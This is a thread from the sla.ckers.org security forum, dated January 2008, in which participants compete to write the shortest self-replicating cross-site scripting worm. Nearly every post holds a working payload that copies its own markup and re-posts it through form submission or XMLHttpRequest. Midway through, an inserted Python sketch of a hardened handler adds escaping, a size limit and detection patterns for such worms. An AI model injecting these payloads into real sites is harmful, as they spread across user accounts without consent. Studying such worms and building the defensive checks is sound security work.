Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 07, 2008 12:09AM

Damn I'm blind, when optimizing the long form (image & XMLHttpRequest) using with() I saw I was using "new XMLHttpRequest" without (), and it had worked all along, but I hadn't used it on the other versions ...
Anyway, the shorter XMLHttpRequest vectors:
<img src=. alt="alert('XSS');with(new XMLHttpRequest){open('post','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))}" onerror=eval(alt)>
256 bytes - XMLHttpRequest, image
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>
253 bytes - XMLHttpRequest, script


Another crazy note: after testing for the first time on Opera 9.5 beta (actually my 'main' browser for the moment), I noticed that the image code didn't work (Opera actually needs some source to fire the onerror). I added a dot and saw that the quotes could be removed (still an innerHTML leftover), saving another 4 bytes! (from 260 to 256 bytes, coming close to the script code :-)
So after Opera testing I fired up Safari (3.0.4 beta for Windows), guess what, even that one passed both vectors like a charm, making it pass on all latest versions of the A-Grade browsers! :-D (BTW I guess FF1.5 and IE6 will work too)

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 07, 2008 12:43AM

<form id=_><input name='content'><script>with(_)alert('XSS',submit(_[0].value='<form id=_>'+innerHTML.slice(action=(method='post')+'.php',142)))</script>

Sorry if somebody else has submitted this, it all looks the same atm.

153 bytes


EDIT:
Please disregard my submission. It's the same as Shawn's example, only it is constructed differently (Shawn's is shown below).

<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/07/2008 05:23AM by digi7al64.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 01:43AM

@sirdarckcat

Yes, I tried parentNode also, but for me it didn't work in FF so I dropped it. I wonder if there are more ways of cloning nodes quickly and without making the code bigger. One limitation is still duplicating the <form> instance.


@Kyran

I think you can shorten it by one byte by dropping the last semicolon, which isn't mandatory but is advised in ECMAScript:
<script>
alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};
</script>


New one:

157 doctype insensitive:

<form id=_><input name='content'><script>x=document._;x[0].value='<form id=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>

extra:

I also thought about making a ternary decision on the doctype:
<form id=_><input name='content'><script>(_)?x=_:x=document.i;x[0].value='<form id=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>

which makes it more robust, but yes larger.





Edited 5 time(s). Last edit at 01/07/2008 03:31AM by Ronald.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 02:50AM

@Ronald: That way it'll work

<form name=_><input name="content"><script>x=document._;x[0].value='<form name=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>
161 bytes

But anyway - very nice one!

Greetings,
.mario



Edited 4 time(s). Last edit at 01/07/2008 03:01AM by .mario.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 03:25AM

How 'bout:

<form name="i" id=j>
<input name='content'><script>(j)?x=j:x=document.i;x[0].value='<form name="i" id=j>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>

It seems cross doctype on my tests!

edit: deleted previous, silly mistake without testing stuff.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 05:03AM

<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>

if the above works on IE count it as my official entry :)
The slice is adjusted depending on the content

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 01/07/2008 05:39AM by Gareth Heyes.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 05:04AM

@Ronald

Ternary operators don't need (), you can save 2 chars ;)


Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 06:10AM

Yeah the form names also don't need quotes, so that's an extra 4 bytes right there, so new_vector=(old-6) :)

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 07, 2008 07:14AM

Another advantage of a worm using XMLHTTP is that it can be made with pure JavaScript.

I would say there are often more opportunities for injecting just JavaScript (script tags, event handlers, etc.) than there are for injecting arbitrary HTML + script.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 08:41AM

Similar technique to my previous one, but this time using body. Also, the payload is the entire page, and since it resubmits the entire page again the worm should be identical.

<body onload="with(document)body.innerHTML='<form action=post.php method=post><textarea name=content>'+body.parentNode.innerHTML,forms[0].submit()"

OR

<script>with(document.body)innerHTML='<form action=post.php method=post><textarea name=content>'+parentNode.innerHTML;document.forms[0].submit()</script>




Edited 3 time(s). Last edit at 01/07/2008 08:50AM by Gareth Heyes.

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 07, 2008 09:19AM

@Gareth - I think this breaks several of the rules.

3) must not grow in size after propagation (if your code starts off as n bytes, it must not grow to n+x). We will assume content will get rejected by post.php if it grows beyond n bytes.
6) must not use knowledge of the DOM unless you name a class or an id and use the class or id. No looking for the n-th script

- RSnake
Gotta love it. http://ha.ckers.org

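The rules above are written from the attacker's side; the defender's side of rule 3 is the part of post.php that has to hold. The following is an added illustration, not code from the thread and not any real post.php: a Python sketch of a hardened content handler that enforces a byte limit, HTML-escapes whatever it stores so it renders as text on re-display, and records heuristic markers that the self-replicating vectors in this thread share (reading their own container back from the DOM, re-posting it, bootstrapping from a tag or event handler). The 255-byte limit, the marker list, the function names and the sample inputs are constructed assumptions.

```python
# Added example (not code from the thread or from any real post.php): a
# hardened handler for a user-content endpoint, written from the defender's
# side of rule 3. It enforces a byte limit, stores user content HTML-escaped
# so it can never execute on re-display, and records heuristic markers shared
# by the self-replicating vectors posted in this thread.
import html
import re

# Constructed assumption: a VARCHAR(255)-style column limit, as mentioned later
# in the thread; a real deployment would take this from the schema.
MAX_CONTENT_BYTES = 255

# Constructed heuristics, named after what the thread's vectors do: read their
# own container back from the DOM, re-post it, and bootstrap from a tag or an
# event handler. Each entry is (flag name, compiled pattern).
_MARKERS = [
    ("dom_self_read", re.compile(r"\b(inner|outer)HTML\b")),
    ("xhr_repost", re.compile(r"\bXMLHttpRequest\b")),
    ("form_submit", re.compile(r"\bsubmit\s*\(")),
    ("event_handler", re.compile(r"\bon(load|error|focus)\s*=", re.I)),
    ("html_tag", re.compile(r"<\s*(script|iframe|img|body|form)\b", re.I)),
]


def replication_flags(content: str) -> list:
    """Return the sorted names of markers found in submitted content.

    This is a logging/triage aid, not the control: the escaping in
    handle_post is what neutralises the markup; flags only decide what
    gets a human look.
    """
    return sorted(name for name, pat in _MARKERS if pat.search(content))


def handle_post(content: str) -> dict:
    """Emulate a hardened post.php: reject over-length input, escape the rest.

    Returns a dict describing the decision so callers can inspect it.
    'stored' is what would be written to the database and later rendered.
    """
    size = len(content.encode("utf-8"))
    flags = replication_flags(content)
    if size > MAX_CONTENT_BYTES:
        # Rule 3's server-side half: a payload that grows past the limit on
        # replication is dropped here instead of being stored truncated.
        return {"accepted": False, "reason": "too_long", "bytes": size, "flags": flags}
    # Escape on the way in (or equivalently on the way out, never neither):
    # '<', '>', '&', '"' and "'" become entities, so the stored text renders
    # as literal characters rather than as tags or attributes.
    stored = html.escape(content, quote=True)
    return {"accepted": True, "reason": "ok", "bytes": size, "flags": flags, "stored": stored}


def render_profile(stored: str) -> str:
    """Wrap already-escaped stored content in a minimal page template."""
    return '<div class="content">' + stored + "</div>"


# Constructed sample inputs: one ordinary comment and one self-replicating
# form vector modelled on the ones posted in this thread (not an exact copy).
SAMPLE_BENIGN = "nice contest, rsnake & co."
SAMPLE_WORM = ("<form id=_><input name=content><script>x=document._;"
               "x[0].value='<form id=_>'+x.innerHTML;x.submit()</script>")

if __name__ == "__main__":
    for sample in (SAMPLE_BENIGN, SAMPLE_WORM, "x" * 300):
        result = handle_post(sample)
        print(result["reason"], result["bytes"], result["flags"])
        if result["accepted"]:
            print("  rendered:", render_profile(result["stored"]))
```

The point of the split between replication_flags and handle_post is that the marker list is only a triage signal and will be bypassed by the next obfuscation trick; the escaping is the control, and it does not care what the content looks like. The byte limit is the one place where rule 3 actually bites a worm that grows on replication, so it belongs on the server rather than in a client-side maxlength.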
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 09:21AM

Yeah, like one of my first worms. :) But it wasn't allowed because RSnake said what it submits/replicates must be very small, think -> VARCHAR(255)

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 09:25AM

@Rsnake

The content is replaced so it should work on any site and the payload does not change so I'm thinking it should be valid. Plus the technique works on IE + Firefox.
IMO it's a bit harsh if it isn't accepted but hey you're the judge.

Does this one break the rules?:-
<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>


Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 09:34AM

Obviously ;) my test script says:

Length: 72
nerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.p</plaintext>

Though the solution is nice the problem is that the slice parameters depend on the victim's site markup. Plus it doesn't alert ;)

Re: Diminutive XSS Worm Replication Contest
Posted by: beNi
Date: January 07, 2008 09:40AM

<b><form action=post.php method=post><input name=content><img src=1 onerror=alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}></form></b>

171 BYTES

Anyway, it's been a long time since I made my last post on this board, but this contest really is a lot of fun. I've used the <img src= because it gives me easy DOM access. I got a solution with more obfuscated code, which is a bit bigger but uses some quite exotic HTML features :o)

Not tested in MSIE because I don't have this browser, I'd appreciate it if someone could try this. Firefox works, and therefore we're done with this ;)

cheers, beni

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 09:48AM

Nope - it's 179 Bytes. Firefox transforms the code like below - manage to reduce it by 23 characters and you're in the game *g*

<b><form action="post.php" method="post"><input name="content"><img src="1" onerror="alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}"></form></b>

Also you can get rid of several bytes if you use better nesting of the methods to avoid usage of ;.



Edited 1 time(s). Last edit at 01/07/2008 09:55AM by .mario.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 10:17AM

OK, this should be valid and is my final entry, I've spent way too much time already:-

<body onload="alert('XSS');with(d=document)body.innerHTML='<form><textarea name=content>'+body.parentNode.innerHTML.match(/.{21}XSS.{176}/);with(d.forms[0])submit(action=method='post'+'.php')"




Edited 2 time(s). Last edit at 01/07/2008 10:20AM by Gareth Heyes.

Re: Diminutive XSS Worm Replication Contest
Posted by: dbloom
Date: January 07, 2008 10:37AM

The source code of some worms may be different after they have been run, depending on whether the replication occurred in IE or Firefox. They may still work in the user agent used for the first generation of replication, but what if the other user agent is used?

For example: suppose site X has an XSS vulnerability.
IE user visits my infected profile on the site. IE user's profile is then infected with the source code after IE replication.
If a Firefox user visits that IE user's profile, does the IE-replicated source code have to replicate in their Firefox browser? Or does it only have to replicate for other IE users? Or, what if it still works, but the length increases, after IE replication-->Firefox replication?

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 10:44AM

Hmmm - doesn't replicate correctly - content=null :-/

Although it's interesting - I didn't know that an onload handler in a second body tag fires if the first ships without it:

<html>
<body onload="alert(1)">
<div></div>
<body onload="alert(2)"></body>
<div></div>
</body>
</html>
alerts 1

<html>
<body>
<div></div>
<body onload="alert(2)"></body>
<div></div>
</body>
</html>
alerts 2



Greetings,
.mario



Edited 2 time(s). Last edit at 01/07/2008 10:45AM by .mario.

Re: Diminutive XSS Worm Replication Contest
Posted by: dbloom
Date: January 07, 2008 10:45AM

You can use <body onfocus> which also fires automatically, but is much less likely to be already defined. That's what I used for my worm.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 10:47AM

@dbloom: not in FF2

sorry - had a mistyping. it works!



Edited 1 time(s). Last edit at 01/07/2008 10:50AM by .mario.

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 07, 2008 11:17AM

@Gareth Heyes - .mario is correct, yours won't work if there is already an event handler assigned to body. Also you are using forms[0] where I said you aren't supposed to have knowledge of the DOM. The reason for this is that there may be other forms on the page above it. It shouldn't break.

@dbloom - I'd be more likely to take onfocus, because, as you said, it's far less often used (actually I've never even seen it in the wild). But to answer your other question it should work perfectly after replicated in both browsers. Otherwise it's far less dangerous and only dangerous to the people who view the original strain with that worm code in it. It's effectively like not making it cross platform at all, since very few people are likely to visit the original page. The only way I could see your method working is if you were to somehow get them to go back to the original page and run the original code if they run across the second variant. So for the purposes of this contest, let's just say it's got to replicate the same in both browsers.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 11:34AM

@rsnake

Yeah it isn't valid but it doesn't matter about document.forms because the vector removes all the content off the page anyway so there would be always one form.


Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 11:38AM

Not aiming for a prize, just iframe fun:

<iframe src=. onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.setRequestHeader('content-type','multipart/form-data');r.send('content='+body.innerHTML)">

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 11:42AM

*COUGH*

this *works* in Firefox...

<iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+body.innerHTML)">

Re: Diminutive XSS Worm Replication Contest
Posted by: beNi
Date: January 07, 2008 11:48AM

Ronald, this isn't just sending the worm code, buddy... try
<b><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+parentNode.innerHTML.bold())"></b>

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 11:55AM

mmm kay, better 1:

<form><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content=<form>'+document.forms[0].innerHTML)">

it may or may not need a closing form tag, but anyhow it works like this.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 11:58AM

This works finally I think:-

<script x="">alert('XSS');with(document)c=body.parentNode.innerHTML.match(/<script x([\n]|.){197}/)[0],body.innerHTML='<form action=post.php method=post><textarea name=content>'+c,forms[0].submit()</script>


Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 07, 2008 12:01PM

Okay, wtf.

<form id=a><input id=x name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))">

(146)

translates to this in FireFox

<form id=a><input id="x" name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></iframe>

(157)

Okay, it's just closing the iframe, that's logic. But check out what IE(tab) does with this:

<form id=a></HEAD><BODY><INPUT id=x name=content><IFRAME onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></IFRAME></BODY>

(173!!)

What the hell? </head>? And why is it opening <body>? Is this because of my iframe? Does this happen also in IE7?

Anyway, this is my official submission until I make something smaller.

EDIT: Yes, it has doctype issues, I am aware of that ;)



Edited 1 time(s). Last edit at 01/07/2008 12:05PM by Spyware.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 12:04PM

OK BeNi let's kick it! :) one byte smaller: (129)

<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

I'm amazed how small we can get each time...



Edited 1 time(s). Last edit at 01/07/2008 12:11PM by Ronald.
